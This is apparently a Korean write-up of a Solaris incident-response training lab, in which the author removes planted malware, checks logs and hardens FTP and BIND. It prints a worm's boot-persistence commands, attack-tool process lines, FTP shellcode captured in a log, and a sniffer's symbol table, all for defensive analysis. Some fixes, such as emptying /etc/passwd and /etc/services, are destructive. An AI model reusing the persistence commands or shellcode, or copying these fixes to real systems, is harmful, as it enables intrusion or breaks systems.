root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ?    0:00 ipmon -Ds
root 26737 1 0 00:32:52 ?    0:00 /usr/src/.poop/hackl.sh
root    65 1 0 Apr 20 ?    0:00 /usr/lib/sysevent/syseventd
root    79 1 0 Apr 20 ?    1:44 /usr/lib/picl/picld
root    74 1 0 Apr 20 ?    0:00 devfsadmd
root 185 1 0 Apr 20 ?    0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ?    0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ?    0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ?    0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ?    0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ?    0:01 /usr/sbin/nscd
root 431 1 0 Apr 20 ?    0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ?    0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ?    0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 Apr 20 ?    0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ?    0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ?    0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ?    0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 Apr 20 ?    0:00 /usr/lib/sendmail -bd -q15m
root 26883 24707 0 00:33:39 pts/2    0:00 ps -ef
root 517 515 0 Apr 20 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ?    0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ?    0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 24707 24699 0 00:16:01 pts/2    0:00 sh
root 596 1 0 Apr 20 ?    0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 Apr 20 ?    0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ?    0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ?    0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ?    0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ?    0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ?    0:00 /usr/lib/saf/ttymon
root 22175 22094 0 23:40:49 pts/3    0:00 login -p -d /dev/pts/3 -h 210.99.
66.1
root 699 1 0 Apr 20 ?    0:00 /usr/lib/saf/sac -t 300
root 22094 418 0 23:39:29 ?    0:00 in.telnetd
root 26745 1 0 00:32:52 ?    0:00 /usr/src/.poop/hackw.sh
root 24663 24569 0 00:15:48 pts/2    0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 24569 418 0 00:14:28 ?    0:00 in.telnetd
root 3374 636 0 Apr 20 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ?    0:00 /usr/openwin/bin/fbconsole -d :0
root 26769 1 0 00:32:52 ?    0:00 /usr/src/.poop/synscan
root 26753 1 0 00:32:52 ?    0:00 /usr/src/.poop/scan.sh
root 26761 1 0 00:32:52 ?    0:00 /usr/src/.poop/start.sh

삭제 작업에 들어갑니다.

# kill -9 26761
# kill -9 26753
# kill -9 26769
# kill -9 26745
# kill -9 26737
# rm -rf /usr/src/.poop/
rm: cannot remove `/usr/src/.poop//core': Permission denied
# rm -rf /sbin/asp
# cat /dev/null > /etc/inetd.conf
# cd /etc/rc.d
# ls -al
total 484
drwxr-xr-x    2 root other 512 Apr 22 00:32 .
drwxr-xr-x 44 root sys 12800 Apr 22 00:15 ..
-rw-------    1 root other    449392 May 13 2006 core
-rw-r--r--    1 root other 22407 Apr 22 00:32 rc.sysinit
# cat /dev/null > rc.sysinit

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!

=====================================================
Question 12 - 불법 Upload에 대한 대처
=====================================================

# find / -name ftp 2> /dev/null
/usr/bin/ftp
/usr/ucb/ftp
/mnt/etc/pam.d/ftp
/mnt/home/ftp
/mnt/usr/bin/ftp
/home/ftp
/home1/user001/ftp
# cd /home/ftp
# ls -al
total 6
drwxr-xr-x    6 root root    512 Nov 5 2000 .
drwxr-xr-x    6 root root    512 Nov 30 2004 ..
d--x--x--x    2 root root    512 Nov 5 2000 bin
d--x--x--x    2 root root    512 Nov 5 2000 etc
drwxr-xr-x    2 root root    512 Nov 5 2000 lib
drwxr-sr-x    2 root 50    512 Feb 5 2000 pub
# cd /home1/user001/ftp
# ls -al
total 5
drwxr-xr-x    5 root other 512 Apr 22 00:37 .
drwxr-xr-x    3 user001 training    512 Apr 22 00:37 ..
drwxr-xr-x    2 root other 512 Apr 22 00:37 bin
drwxr-xr-x    2 root other 512 Apr 22 00:37 etc
drwxr-xr-x    2 root other 512 Apr 22 00:37 incoming
# cd incoming
# ls -al
total 2
drwxr-xr-x    2 root other 512 Apr 22 00:37 .
drwxr-xr-x    5 root other 512 Apr 22 00:37 ..
-rw-r--r--    1 root other 0 Apr 22 00:37 Home.Alone.1.avi
-rw-r--r--    1 root other 0 Apr 22 00:37 Home.Alone.3.DVDRip.
.MM4.cDiAMOND.avi
-rw-r--r--    1 root other 0 Apr 22 00:37 Home.Alone.4.2002.ST
Drip.XVID.avi
-rw-r--r--    1 root other 0 Apr 22 00:37 Home.Alone.II.Lost.I
w.York.AC3.CD1-ADD.avi
-rw-r--r--    1 root other 0 Apr 22 00:37 Home.Alone.II.Lost.I
w.York.AC3.CD2-ADD.avi
# rm -rf *
# ls -al
total 2
drwxr-xr-x    2 root other 512 Apr 22 00:39 .
drwxr-xr-x    5 root other 512 Apr 22 00:37 ..
# cd ..
# ls -al
total 5
drwxr-xr-x    5 root other 512 Apr 22 00:37 .
drwxr-xr-x    3 user001 training    512 Apr 22 00:37 ..
drwxr-xr-x    2 root other 512 Apr 22 00:37 bin
drwxr-xr-x    2 root other 512 Apr 22 00:37 etc
drwxr-xr-x    2 root other 512 Apr 22 00:39 incoming
# cat > .rhosts
# cat > .foward
# ls -al
total 5
drwxr-xr-x    5 root other 512 Apr 22 00:39 .
drwxr-xr-x    3 user001 training    512 Apr 22 00:37 ..
-rw-r--r--    1 root other 0 Apr 22 00:39 .foward
-rw-r--r--    1 root other 0 Apr 22 00:39 .rhosts
drwxr-xr-x    2 root other 512 Apr 22 00:37 bin
drwxr-xr-x    2 root other 512 Apr 22 00:37 etc
drwxr-xr-x    2 root other 512 Apr 22 00:39 incoming
# chmod 000 .foward
# chmod 000 .rhosts
# ls -al
total 5
drwxr-xr-x    5 root other 512 Apr 22 00:39 .
drwxr-xr-x    3 user001 training    512 Apr 22 00:37 ..
----------    1 root other 0 Apr 22 00:39 .foward
----------    1 root other 0 Apr 22 00:39 .rhosts
drwxr-xr-x    2 root other 512 Apr 22 00:37 bin
drwxr-xr-x    2 root other 512 Apr 22 00:37 etc
drwxr-xr-x    2 root other 512 Apr 22 00:39 incoming
# cd ..
# ls -al
total 8
drwxr-xr-x    3 user001 training    512 Apr 22 00:37 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r--    1 user001 training    185 Apr 22 00:15 .profile
drwxr-xr-x    5 root other 512 Apr 22 00:39 ftp
-rw-r--r--    1 user001 training    124 Apr 22 00:15 local.cshrc
-rw-r--r--    1 user001 training    607 Apr 22 00:15 local.login
-rw-r--r--    1 user001 training    582 Apr 22 00:15 local.profile
# chown root ftp
# chmod 555 ftp
# cd ./ftp/
# ls -al
total 5
dr-xr-xr-x    5 root other 512 Apr 22 00:39 .
drwxr-xr-x    3 user001 training    512 Apr 22 00:37 ..
----------    1 root other 0 Apr 22 00:39 .foward
----------    1 root other 0 Apr 22 00:39 .rhosts
drwxr-xr-x    2 root other 512 Apr 22 00:37 bin
drwxr-xr-x    2 root other 512 Apr 22 00:37 etc
drwxr-xr-x    2 root other 512 Apr 22 00:39 incoming
# chmod 111 bin
# chmod 111 etc

# ps -ef | grep ftp
root 28156 28143 0 00:42:26 ?    0:00 in.ftpd
root 28145 28143 0 00:42:26 ?    0:00 in.ftpd
root 28158 28143 0 00:42:26 ?    0:00 in.ftpd
root 28159 28143 0 00:42:26 ?    0:00 in.ftpd
root 28155 28143 0 00:42:26 ?    0:00 in.ftpd
root 28154 28143 0 00:42:26 ?    0:00 in.ftpd
root 28147 28143 0 00:42:26 ?    0:00 in.ftpd
root 28151 28143 0 00:42:26 ?    0:00 in.ftpd
root 28150 28143 0 00:42:26 ?    0:00 in.ftpd
root 28149 28143 0 00:42:26 ?    0:00 in.ftpd
root 28148 28143 0 00:42:26 ?    0:00 in.ftpd
root 28526 24707 0 00:46:38 pts/2    0:00 grep ftp
root 28146 28143 0 00:42:26 ?    0:00 in.ftpd
# kill -9 28156
# kill -9 28145
# kill -9 28158
# kill -9 28159
# kill -9 28154
# kill -9 28147
# kill -9 28151
# kill -9 28149
# kill -9 28148
# kill -9 28146

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!

=====================================================
Question 13 - 악성 프로그램 분석 절차 습득 =====================================================

# ls -alQ
total 537
drwxr-xr-x    2 root other 512 Apr 22 00:58 "."
drwxr-xr-x    5 root other 512 May 6 2006 ".."
-r-xr--r--    1 root other 80896 Apr 22 00:58 ".. "
-rw-------    1 root other    457584 May 6 2006 "core"

파일이 하나 숨겨져 있는것을 볼 수 있습니다.

파일을 home으로 복사해 옵니다.

# cp ".. " /home1/user001/
# cd /home1/user001
# ls -al
total 86
drwxr-xr-x    2 user001 training    512 Apr 22 01:00 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r--    1 root other 80896 Apr 22 01:00 ..
-rw-r--r--    1 user001 training    185 Apr 22 00:15 .profile
-rw-r--r--    1 user001 training    124 Apr 22 00:15 local.cshrc
-rw-r--r--    1 user001 training    607 Apr 22 00:15 local.login
-rw-r--r--    1 user001 training    582 Apr 22 00:15 local.profile
# tar -xvf ".. "
x ./.ami, 79132 bytes, 155 tape blocks
# ls -al
total 164
drwxr-xr-x    2 user001 training    512 Apr 22 01:00 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r--    1 root other 80896 Apr 22 01:00 ..
-rwxr-xr-x    1 root other 79132 Dec 24 2003 .ami
-rw-r--r--    1 user001 training    185 Apr 22 00:15 .profile
-rw-r--r--    1 user001 training    124 Apr 22 00:15 local.cshrc
-rw-r--r--    1 user001 training    607 Apr 22 00:15 local.login
-rw-r--r--    1 user001 training    582 Apr 22 00:15 local.profile
# file .ami
.ami: ELF 32-bit MSB executable SPARC Version 1, dynamically linked, n
ot stripped

파일로 부터 정보를 수집합니다.

# strings .ami
dotdot
/bin
/sbin
/etc
/usr/bin
/usr/sbin
/usr/ucb
/usr/ccs/bin
/usr/local/bin
/usr/local/sbin
/opt
This programm is running on U x environment
aion@ .net
TCP 1 5
%s/%s/pid%d.%s
.cache
/etc/.evrc
RC_ROOT
Error : Unknown system error.
Error : Not a training user.
Removing %s/*..

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 의심스러운 프로그램의 실행 운영체제 환경은?
Answer > U x
Question > 이 프로그램을 작성한 것으로 간주되는 사람의 메일 주소는?
Answer > aion@ .net
Question > 악성 프로그램이 사용할 것으로 의심되는 서비스와 포트는(예 TCP 23)?
Answer > TCP 1 5
Congratz! You made a success of challenge!

=====================================================
Question 14 - Monitoring
=====================================================

# kill -9 1591
# ls /usr/lib/.*bug* -al
-r-xr--r--    1 root other    115624 Apr 22 01:20 /usr/lib/.bugtraq
-rw-r--r--    1 root other 0 Apr 22 01:20 /usr/lib/.bugtraq.c
-rw-r--r--    1 root other 0 Apr 22 01:20 /usr/lib/.uubugtraq
# rm -rf /usr/lib/.bugtraq
# rm -rf /usr/lib/.bugtraq.c

# rm -rf /usr/lib/.uubugtraq
#

#
finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!

=====================================================
Question 15 - Investigation
=====================================================

ftp 관련 문제점이라고 하길래,
log에서 ftp 관련된게 있나 찾아 보았습니다.

# cat messages* | grep ftp

Apr 20 20:17:24 cert inetd[418]: [ID 965992 daemon.error] ftp/tcp: unknown servi

ce
cat: cannot open Sep 28 14:46:25 victim ftpd[14989]: ANONYMOUS FTP LOGIN FROM gr

over.tester.org [192.168.222.1], ???????????????????????????????????????????????

????????????????????????????????????????????????????????????????????????????????

????????????????????????????????1A1U1E°FI?1A1UC‰UA°?I?ek^1A1E?^^A?F^Df¹y^A

°'I?1A?^^A°=I?1A1U?^^H‰C^B1EþE1A?^^H°^LI?þEuo1A?F^I?^^H°=I?þ^N°0þE

?F^D1A?F^G‰v^H‰F^L‰o?N^H?V^L°^KI?1A1U°^AI?e?yyy0bin0sh1..11
4
Sep 28 14:46:25 victim ftpd[14989]: ANONYMOUS FTP LOGIN FROM grover.tester.org [

192.168.222.1], ????????????????????????????????????????????????????????????????

????????????????????????????????????????????????????????????????????????????????

???????????????1A1U1E°FI?1A1UC‰UA°?I?ek^1A1E?^^A?F^Df¹y^A°'I?1A?^^A°=I
?1A1U?^^H‰C^B1EþE1A?^^H°^LI?þEuo1A?F^I?^^H°=I?þ^N°0þE?F^D1A?F^G‰v^H
‰F^L‰o?N^H?V^L°^KI?1A1U°^AI?e?yyy0bin0sh1..11

무언가 공격을 시도한 것으로 보입니다.
이제 inetd.conf를 unset해주고 inetd 데몬을 재시작 시켜 줍니다.

#
cat /dev/null > /etc/inetd.conf
# ps -ef | grep inetd
root 418 1 0 Apr 20 ?    0:00 /usr/sbin/rcinetd -s
root 8394 1 0 11:06:56 ?    0:00 /usr/sbin/inetd -s
root 8525 6638 0 11:08:59 pts/2    0:00 grep inetd
# kill -HUP 8394
#

finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 로그 기록상 공격자의 IP 로 추정되는 곳은?
Answer >
192.168.222.1
Congratz! You made a success of challenge!

=====================================================
Question 16 - 시스템 상태 분석
=====================================================

파일 크기가 다르면 잘 안되나 보다 -_- fuck..

=====================================================
Question 17 - BIND 취약점
=====================================================

/etc/named.conf에 다음과 같은 한줄을 추가 시켜줍니다.

# vi /etc/named.conf
"/etc/named.conf" 21 lines, 331 characters
options {
recursion no;
directory "/var/named";
};

저장하고, /usr/sbin/named를 실행시켜주면 끝입니다.

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!

=====================================================
Question 18 - 로그설정(서버, 라우터)
=====================================================

이 문제는 현재 풀이가 불가능한 상태로 보인다.

=====================================================
Question 19 - 로그 분석 영역
=====================================================

# challenge 19
Now, You are challenging question 19.
Good Luck!
# /usr/local/bin/chklastlog
user vision deleted or never loged from lastlog!
# cat /dev/null > /etc/passwd
# cd /home1/vision
# ls -al
total 11
drwxr-xr-x 2 root other 2560 Apr 22 13:10 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r-- 1 root other 5381 Apr 22 13:10 zap2.c
# rm -rf zap2.c

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!

=====================================================
Question 20 - 특정 사고별 분석
=====================================================

worm의 프로세스로 추정되는 프로세스들을 찾았습니다.

해당 경로로 가서 파일들을 살펴 봅니다.

# cd /dev/cuc
# ls -al
total 805
drwxr-xr-x    2 root other    1024 Apr 22 13:12 .
drwxr-xr-x 20 root sys    4096 Apr 22 02:06 ..
-rw-r--r--    1 root other 241 Apr 22 13:12 cmd.txt
-rw-r--r--    1 root root    241 Apr 14 2006 cmd.txt.13
-rw-r--r--    1 root root    241 Oct 26 2005 cmd.txt.33
-rw-r--r--    1 root root    241 Oct 25 2005 cmd.txt.38
-r-xr--r--    1 root other    115788 Apr 22 13:12 grabbb
-r-xr--r--    1 root root 115788 Apr 14 2006 grabbb.13
-r-xr--r--    1 root root 115788 Oct 26 2005 grabbb.33
-r-xr--r--    1 root root 115788 Oct 25 2005 grabbb.38
-rw-r--r--    1 root other    1591 Apr 22 13:12 sadmin.sh
-rw-r--r--    1 root root 1591 Apr 14 2006 sadmin.sh.13
-rw-r--r--    1 root root 1591 Oct 26 2005 sadmin.sh.33
-rw-r--r--    1 root root 1591 Oct 25 2005 sadmin.sh.38
-rw-r--r--    1 root other 566 Apr 22 13:12 time.sh
-rw-r--r--    1 root root    566 Apr 14 2006 time.sh.13
-rw-r--r--    1 root root    566 Oct 26 2005 time.sh.33
-rw-r--r--    1 root root    566 Oct 25 2005 time.sh.38
-rw-r--r--    1 root other 67798 Apr 22 13:12 uniattack.pl
-rw-r--r--    1 root root    67798 Apr 14 2006 uniattack.pl.13
-rw-r--r--    1 root root    67798 Oct 26 2005 uniattack.pl.33
-rw-r--r--    1 root root    67798 Oct 25 2005 uniattack.pl.38
-rw-r--r--    1 root other 646 Apr 22 13:12 uniattack.sh
-rw-r--r--    1 root root    646 Apr 14 2006 uniattack.sh.13
-rw-r--r--    1 root root    646 Oct 26 2005 uniattack.sh.33
-rw-r--r--    1 root root    646 Oct 25 2005 uniattack.sh.38
# cat cmd.txt
/bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1
/bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1
/bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2
/bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc
/bin/chmod 744 /etc/rc2.d/S71rpc

해당 폴더, /etc/rc2.d/tmp1,/etc/rc2.d/S71rpc,/etc/rc2.d/tmp2 등을 지우고,
악성 프로세스들을 모두 죽입니다.

# ps -ef|grep cuc
root 17049 1 0 13:12:27 ?    0:00 /bin/vsh /dev/cuc/uniattack.sh
root 17035 1 0 13:12:27 ?    0:00 /dev/cuc/grabbb -t 3 -a 192.168.1
.20 -b 224.225.98.6 111
root 17044 1 0 13:12:27 ?    0:00 /bin/vsh /dev/cuc/sadmin.sh
root 17054 1 0 13:12:27 ?    0:00 /bin/vsh /dev/cuc/time.sh
root 17063 1 0 13:12:27 ?    0:00 /usr/local/bin/perl /dev/cuc/unia
ttack.pl 224.225.98.6:80
root 17268 16670 0 13:15:39 pts/2    0:00 grep cuc
#
# kill -9 17049
# kill -9 17035
# kill -9 17044
# kill -9 17054
# kill -9 17063
# rm -rf /dev/cuc/
rm: cannot remove `/dev/cuc//cmd.txt.38': Permission denie
rm: cannot remove `/dev/cuc//sadmin.sh.38': Permission den
rm: cannot remove `/dev/cuc//uniattack.sh.38': Permission
rm: cannot remove `/dev/cuc//time.sh.38': Permission denie
rm: cannot remove `/dev/cuc//uniattack.pl.38': Permission
rm: cannot remove `/dev/cuc//grabbb.38': Permission denied
rm: cannot remove `/dev/cuc//cmd.txt.13': Permission denie
rm: cannot remove `/dev/cuc//sadmin.sh.13': Permission den
rm: cannot remove `/dev/cuc//uniattack.sh.13': Permission
rm: cannot remove `/dev/cuc//time.sh.13': Permission denie
rm: cannot remove `/dev/cuc//uniattack.pl.13': Permission
rm: cannot remove `/dev/cuc//cmd.txt.33': Permission denie
rm: cannot remove `/dev/cuc//sadmin.sh.33': Permission den
rm: cannot remove `/dev/cuc//uniattack.sh.33': Permission
rm: cannot remove `/dev/cuc//time.sh.33': Permission denie
rm: cannot remove `/dev/cuc//uniattack.pl.33': Permission
rm: cannot remove `/dev/cuc//grabbb.33': Permission denied
rm: cannot remove `/dev/cuc//grabbb.13': Permission denied
# rm -rf /etc/rc2.d/tmp1
# rm -rf /etc/rc2.d/S71rpc
# rm -rf /etc/rc2.d/tmp2

# cat /dev/null > /etc/services
# cat /dev/null > /etc/inetd.conf

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!

=====================================================
Question 21 - 악성 프로그램 분석
=====================================================

# /usr/ccs/bin/nm /dev/a.out

/dev/a.out:

[Index] Value Size Type Bind Other Shndx Name

[29]    | 0| 0|SECT |LOCL |0    |28 |
[28]    | 0| 0|SECT |LOCL |0    |27 |
[27]    | 0| 0|SECT |LOCL |0    |26 |
[26]    | 0| 0|SECT |LOCL |0    |25 |
[25]    | 0| 0|SECT |LOCL |0    |24 |
[24]    | 0| 0|SECT |LOCL |0    |23 |
[23]    |    147264| 0|SECT |LOCL |0    |22 |
[21]    |    147252| 0|SECT |LOCL |0    |20 |
[20]    |    147248| 0|SECT |LOCL |0    |19 |
[19]    |    147240| 0|SECT |LOCL |0    |18 |
[17]    |    147188| 0|SECT |LOCL |0    |16 |
[16]    |    146996| 0|SECT |LOCL |0    |15 |
[15]    |    146536| 0|SECT |LOCL |0    |14 |
[18]    |    147232| 0|SECT |LOCL |0    |17 |
[22]    |    147256| 0|SECT |LOCL |0    |21 |
[2] | 65748| 0|SECT |LOCL |0    |1    |
[3] | 65768| 0|SECT |LOCL |0    |2    |
[4] | 66492| 0|SECT |LOCL |0    |3    |
[6] | 68664| 0|SECT |LOCL |0    |5    |
[7] | 68728| 0|SECT |LOCL |0    |6    |
[5] | 67932| 0|SECT |LOCL |0    |4    |
[8] | 68764| 0|SECT |LOCL |0    |7    |
[9] | 68800| 0|SECT |LOCL |0    |8    |
[10]    | 69208| 0|SECT |LOCL |0    |9    |
[11]    | 79236| 0|SECT |LOCL |0    |10 |
[12]    | 79264| 0|SECT |LOCL |0    |11 |
[13]    | 79288| 0|SECT |LOCL |0    |12 |
[14]    |    146496| 0|SECT |LOCL |0    |13 |
[134] |    147224| 4|OBJT |GLOB |0    |16 |CLroot
[117] | 70908|    1520|FUNC |GLOB |0    |9    |END_NODE
[81]    | 70700| 208|FUNC |GLOB |0    |9    |GET_NODE
[113] |    148260| 4|OBJT |GLOB |0    |22 |LOG
[130] |    147220| 4|OBJT |GLOB |0    |16 |LastTIME
[99]    |    148256| 4|OBJT |GLOB |0    |22 |LogName
[75]    | 70656|    44|FUNC |GLOB |0    |9    |NOWtm
[109] |    148272| 16512|OBJT |GLOB |0    |22 |Packet
[96]    | 69672|    40|FUNC |GLOB |0    |9    |Pexit
[147] |    148264| 4|OBJT |GLOB |0    |22 |ProgName
[77]    | 70592|    64|FUNC |GLOB |0    |9    |Ptm
[146] | 70348| 244|FUNC |GLOB |0    |9    |SERVp
[65]    | 69760| 116|FUNC |GLOB |0    |9    |Symaddr
[101] | 69876| 472|FUNC |GLOB |0    |9    |TCPflags
[149] | 69712|    48|FUNC |GLOB |0    |9    |Zexit
[104] |    146996| 0|OBJT |GLOB |0    |15 |_DYNAMIC
[31]    |    295856| 0|OBJT |LOCL |0    |22 |_END_
[102] |    146496| 0|OBJT |GLOB |0    |13 |_GLOBAL_OFFSET_
[82]    | 0| 0|NOTY |WEAK |0    |UNDEF |_Jv_RegisterCla
[126] |    146536| 0|OBJT |GLOB |0    |14 |_PROCEDURE_LINK
[30]    | 65536| 0|OBJT |LOCL |0    |1    |_START_
[56]    |    147236| 0|OBJT |LOCL |0    |17 |__CTOR_END__
[39]    |    147232| 0|OBJT |LOCL |0    |17 |__CTOR_LIST__
[53]    |    147244| 0|OBJT |LOCL |0    |18 |__DTOR_END__
[40]    |    147240| 0|OBJT |LOCL |0    |18 |__DTOR_LIST__
[41]    |    147248| 0|OBJT |LOCL |0    |19 |__EH_FRAME_BEGI
[59]    |    147248| 0|OBJT |LOCL |0    |19 |__FRAME_END__
[58]    |    147252| 0|OBJT |LOCL |0    |20 |__JCR_END__
[46]    |    147252| 0|OBJT |LOCL |0    |20 |__JCR_LIST__
[140] |    147408| 521|OBJT |GLOB |0    |22 |__ctype
[98]    | 0| 0|NOTY |WEAK |0    |UNDEF |__deregister_fr
[54]    | 79140| 0|FUNC |LOCL |0    |9    |__do_global_cto
[35]    | 69332| 0|FUNC |LOCL |0    |9    |__do_global_dto
[62]    |    147192| 0|OBJT |GLOB |0    |16 |__dso_handle
[94]    |    147936| 320|OBJT |GLOB |0    |22 |__iob
[85]    | 0| 0|NOTY |WEAK |0    |UNDEF |__register_fram
[64]    |    147408| 521|OBJT |WEAK |0    |22 |_ctype
[66]    |    147260| 0|OBJT |GLOB |0    |21 |_edata
[108] |    295856| 0|OBJT |GLOB |0    |22 |_end
[86]    |    147400| 4|OBJT |GLOB |0    |22 |_environ
[132] | 80960| 0|OBJT |GLOB |0    |12 |_etext
[128] |    146608| 0|FUNC |GLOB |0    |UNDEF |_exit
[97]    | 79264|    20|FUNC |GLOB |0    |11 |_fini
[74]    | 79236|    28|FUNC |GLOB |0    |10 |_init
[80]    |    147936| 320|OBJT |WEAK |0    |22 |_iob
[129] | 79288| 4|OBJT |GLOB |0    |12 |_lib_version
[84]    | 69208| 116|FUNC |GLOB |0    |9    |_start
[1] | 0| 0|FILE |LOCL |0    |ABS    |a.out
[63]    |    146836| 0|FUNC |GLOB |0    |UNDEF |alarm
[91]    |    146584| 0|FUNC |GLOB |0    |UNDEF |atexit
[148] |    146968| 0|FUNC |GLOB |0    |UNDEF |atoi
[48]    |    147304|    10|OBJT |LOCL |0    |22 |buf.1
[125] |    147208| 4|OBJT |GLOB |0    |16 |bufmod
[55]    | 79220| 0|FUNC |LOCL |0    |9    |call___do_globa
x
[37]    | 69508| 0|FUNC |LOCL |0    |9    |call___do_globa
x
[42]    | 69656| 0|FUNC |LOCL |0    |9    |call_frame_dumm
[95]    | 74264| 212|FUNC |GLOB |0    |9    |clear_victim
[44]    |    147264| 1|OBJT |LOCL |0    |22 |completed.1
[32]    | 0| 0|FILE |LOCL |0    |ABS    |crti.s
[60]    | 0| 0|FILE |LOCL |0    |ABS    |crtn.s
[52]    | 0| 0|FILE |LOCL |0    |ABS    |crtstuff.c
[34]    | 0| 0|FILE |LOCL |0    |ABS    |crtstuff.c
[116] |    146920| 0|FUNC |GLOB |0    |UNDEF |crypt
[143] |    146716| 0|FUNC |GLOB |0    |UNDEF |ctime
[107] |    164784| 131072|OBJT |GLOB |0    |22 |databuf
[89]    |    147196| 4|OBJT |GLOB |0    |16 |debug
[78]    |    148268| 4|OBJT |GLOB |0    |22 |device
[103] | 75284| 120|FUNC |GLOB |0    |9    |dlattachreq
[122] | 75780| 172|FUNC |GLOB |0    |9    |dlbindack
[88]    | 75612| 168|FUNC |GLOB |0    |9    |dlbindreq
[137] | 75404| 208|FUNC |GLOB |0    |9    |dlokack
[61]    | 75952| 120|FUNC |GLOB |0    |9    |dlpromisconreq
[136] | 76108|    1272|FUNC |GLOB |0    |9    |do_it
[110] |    147400| 4|OBJT |WEAK |0    |22 |environ
[87]    | 74476| 100|FUNC |GLOB |0    |9    |err
[50]    |    147320|    80|OBJT |LOCL |0    |22 |errmsg.2
[115] |    146596| 0|FUNC |GLOB |0    |UNDEF |exit
[145] | 75064|    80|FUNC |GLOB |0    |9    |expecting
[139] |    146812| 0|FUNC |GLOB |0    |UNDEF |fclose
[83]    |    146764| 0|FUNC |GLOB |0    |UNDEF |fflush
[68]    | 72428|    1836|FUNC |GLOB |0    |9    |filter
[112] |    147212| 4|OBJT |GLOB |0    |16 |filter_flags
[121] |    146956| 0|FUNC |GLOB |0    |UNDEF |fopen
[38]    |    147188| 0|OBJT |LOCL |0    |16 |force_to_data
[57]    |    147228| 0|OBJT |LOCL |0    |16 |force_to_data
[118] |    146668| 0|FUNC |GLOB |0    |UNDEF |fprintf
[120] |    146752| 0|FUNC |GLOB |0    |UNDEF |fputc
[36]    | 69524| 0|FUNC |LOCL |0    |9    |frame_dummy
[106] |    146776| 0|FUNC |GLOB |0    |UNDEF |free
[76]    | 77380| 144|FUNC |GLOB |0    |9    |getauth
[133] |    146680| 0|FUNC |GLOB |0    |UNDEF |gethostbyaddr
[131] |    146848| 0|FUNC |GLOB |0    |UNDEF |getmsg
[142] |    146908| 0|FUNC |GLOB |0    |UNDEF |getpass
[114] |    146980| 0|FUNC |GLOB |0    |UNDEF |getpid
[127] |    147200| 4|OBJT |GLOB |0    |16 |if_fd
[72]    |    146692| 0|FUNC |GLOB |0    |UNDEF |inet_ntoa
[49]    |    147296| 8|OBJT |LOCL |0    |22 |iobuf.0
[69]    |    146860| 0|FUNC |GLOB |0    |UNDEF |ioctl
[111] | 77524|    1608|FUNC |GLOB |0    |9    |main
[70]    |    146800| 0|FUNC |GLOB |0    |UNDEF |malloc
[79]    |    147216| 4|OBJT |GLOB |0    |16 |maxbuflen
[71]    |    146788| 0|FUNC |GLOB |0    |UNDEF |memcpy
[43]    |    147268|    24|OBJT |LOCL |0    |22 |object.2
[67]    |    146884| 0|FUNC |GLOB |0    |UNDEF |open
[45]    |    147256| 0|OBJT |LOCL |0    |21 |p.0
[90]    |    146656| 0|FUNC |GLOB |0    |UNDEF |perror
[135] |    147204| 4|OBJT |GLOB |0    |16 |promisc
[92]    |    146872| 0|FUNC |GLOB |0    |UNDEF |putmsg
[51]    | 74576|    32|FUNC |LOCL |0    |9    |sigalrm
[119] |    146824| 0|FUNC |GLOB |0    |UNDEF |signal
[47]    | 0| 0|FILE |LOCL |0    |ABS    |solsniff.c
[123] |    146704| 0|FUNC |GLOB |0    |UNDEF |sprintf
[100] |    146932| 0|FUNC |GLOB |0    |UNDEF |strcmp
[73]    |    146896| 0|FUNC |GLOB |0    |UNDEF |strcpy
[105] | 74608| 456|FUNC |GLOB |0    |9    |strgetmsg
[141] | 75144| 140|FUNC |GLOB |0    |9    |strioctl
[138] |    146728| 0|FUNC |GLOB |0    |UNDEF |strlen
[144] | 76072|    36|FUNC |GLOB |0    |9    |syserr
